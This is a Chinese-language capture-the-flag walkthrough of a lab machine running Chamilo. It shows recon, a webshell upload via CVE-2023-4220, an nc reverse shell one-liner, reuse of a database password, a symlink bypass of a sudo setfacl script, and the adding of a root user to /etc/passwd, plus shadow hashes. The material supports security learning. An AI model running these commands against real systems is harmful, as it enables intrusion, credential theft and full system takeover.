基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV 10.10.11.23
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-08 13:12 CST
Nmap scan report for 10.10.11.23
Host is up (0.089s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.05 seconds

80

需要加hosts:

1
10.10.11.23 permx.htb

在线学习平台:

子域名扫描

主站没什么东西,子域名可以发现一个lms:

1
2
3
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://permx.htb/" -H 'Host: FUZZ.permx.htb'  -fw 18

lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 142ms]

lms

添加hosts后访问,是一个Chamilo做的系统:

CVE-2023-4220

搜索可以发现Chamilo相关漏洞:

按照文章中的方式获取webshell即可

1
2
3
curl -F 'bigUploadFile=@miao.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/miao.php?cmd=id

reverse shell

然后webshell执行命令获取reverse shell:

1
2
3
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.16%204444%20%3E%2Ftmp%2Ff

python3 -c 'import pty;pty.spawn("/bin/bash")'

信息

常规翻配置文件,得到数据库配置信息:

1
2
3
4
5
6
7
8
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
$_configuration['db_manager_enabled'] = false;
$_configuration['root_sys'] = '/var/www/chamilo/';
$_configuration['url_append'] = '';

user flag

基础的密码复用,mtz用户复用了数据库密码:

1
2
ssh mtz@10.10.11.23
03F6lY3uXAP2bkW8

提权信息

mtz用户可以sudo运行指定的acl.sh文件,查看文件内容就是给指定用户指定文件权限,并且存在简单过滤,最终调用了setfacl:

很简单的逻辑,target需要以mtz用户目录开头,并且过滤了常规的..跳转,但软链接即可绕过

提权 & root flag

做个软链接修改文件权限,例如可以修改shadow,passwd之类,然后添加个root:

1
2
3
4
5
6
7
8
9
10
ln -s / miao

sudo /opt/acl.sh mtz rwx /home/mtz/miao/etc/passwd

openssl passwd "password"
$1$vudO3hjG$iKCmxTMP.FoY3NBjUgxmr/
echo 'miao:$1$vudO3hjG$iKCmxTMP.FoY3NBjUgxmr/:0:0:root:/root:/bin/bash' >> /home/mtz/miao/etc/passwd

su miao
# 密码就是设置的password

shadow

1
2
root:$y$j9T$VEMcaSLaOOvSE3mYgRXRv/$tNXYdTRyCAkwoSHhlyIoCS91clvPEp/hh0r4NTBlmS7:19742:0:99999:7:::
mtz:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::

参考资料